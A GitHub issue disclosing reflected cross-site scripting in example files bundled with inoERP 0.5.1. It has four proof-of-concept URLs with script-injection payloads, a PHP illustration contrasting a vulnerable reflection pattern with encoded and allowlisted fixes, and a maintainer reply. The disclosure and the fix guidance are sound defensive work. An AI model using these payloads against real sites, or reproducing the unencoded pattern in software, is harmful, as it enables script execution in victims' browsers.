inoerp/inoERP

inoerp – Multiple Cross-Site Scripting (XSS)

bestshow opened this issue · 1 comment

Product: inoerp
Download: https://github.com/inoerp/inoERP
Vulnerable Version: 0.5.1 and probably prior
Tested Version: 0.5.1
Author: ADLab of Venustech

Advisory Details:
Multiple Cross-Site Scripting (XSS) vulnerabilities were discovered in "inoerp 0.5.1", which can be exploited to execute arbitrary code.
The vulnerabilities exist due to insufficient filtering of user-supplied data in multiple HTTP GET parameters passed to several URLs. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website.
The exploitation examples below use the "alert()" JavaScript function to show a pop-up message box:
Poc:
(1)
http://localhost/.../inoERP-master/inoerp/locale/examples/pigs_dropin.php?lang=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
(2)
http://localhost/.../inoERP-master/inoerp/locale/examples/pigs_fallback.php?lang=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
(3)
http://localhost/.../inoERP-master/inoerp/tparty/extensions/social_login/hybridauth/examples/social_hub/includes/menu.php?provider=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
(4)
http://localhost/.../inoERP-master/inoerp/tparty/extensions/social_login/hybridauth_old/examples/social_hub/includes/menu.php?provider=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
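
The four PoCs above share one pattern: a GET parameter (`lang`, `provider`) is reflected into HTML without output encoding, and the payload `"><script>alert(1);</script><"` closes the surrounding attribute and opens a script tag. The following is an added illustration, not code from inoERP or from the bundled locale/hybridauth example files; the `render_vulnerable` handler is a hypothetical reconstruction of that pattern, not the real `pigs_dropin.php` or `menu.php` source. It runs from the PHP CLI and prints the same constructed payload passed through the unsafe path, an encoded path, and an allowlisted path.

```php
<?php
// Added example (not inoERP or third-party code). Demonstrates why the
// advisory's payload works and two ways to stop it.

// The advisory's payload, URL-decoded: "><script>alert(1);</script><"
$payload = urldecode('%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22');

// Hypothetical vulnerable pattern: the raw parameter is concatenated into an
// HTML attribute value. A double quote in the input terminates the attribute.
function render_vulnerable(array $get): string
{
    $lang = $get['lang'] ?? 'en';
    return '<input type="hidden" name="lang" value="' . $lang . '">';
}

// Hardened: encode for the HTML attribute context. ENT_QUOTES covers both
// quote styles; <, > and & are always converted by htmlspecialchars.
function render_hardened(array $get): string
{
    $lang = $get['lang'] ?? 'en';
    $safe = htmlspecialchars($lang, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="lang" value="' . $safe . '">';
}

// Stricter: a locale code has a known shape, so anything else is rejected
// and replaced by a default instead of being reflected at all.
function render_allowlisted(array $get): string
{
    $lang = $get['lang'] ?? 'en';
    if (!preg_match('/^[a-z]{2,3}(_[A-Z]{2})?$/', $lang)) {
        $lang = 'en'; // fall back rather than echo attacker-controlled input
    }
    return '<input type="hidden" name="lang" value="' . $lang . '">';
}

// Constructed request: the same input a browser would send for PoC (1).
$get = ['lang' => $payload];

echo "Vulnerable:  " . render_vulnerable($get) . "\n";
// -> <input type="hidden" name="lang" value=""><script>alert(1);</script><"">
echo "Hardened:    " . render_hardened($get) . "\n";
// -> value="&quot;&gt;&lt;script&gt;alert(1);&lt;/script&gt;&lt;&quot;"
echo "Allowlisted: " . render_allowlisted($get) . "\n";
// -> value="en"
```

Two points a practitioner would check independently of the fix: the encoding must match the output context (attribute, element body, JavaScript string, URL), since `htmlspecialchars` only covers the first two; and all four affected paths sit under `examples/` directories of bundled third-party libraries, so deleting those directories from a deployment removes the reflection points without changing any inoERP code.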

Hi bestshow,

All the products you have mentioned (locale/hybridauth) are third-party applications and not developed by inoERP.
You don't need to use any third-party application to use inoERP. You can just remove them from your application.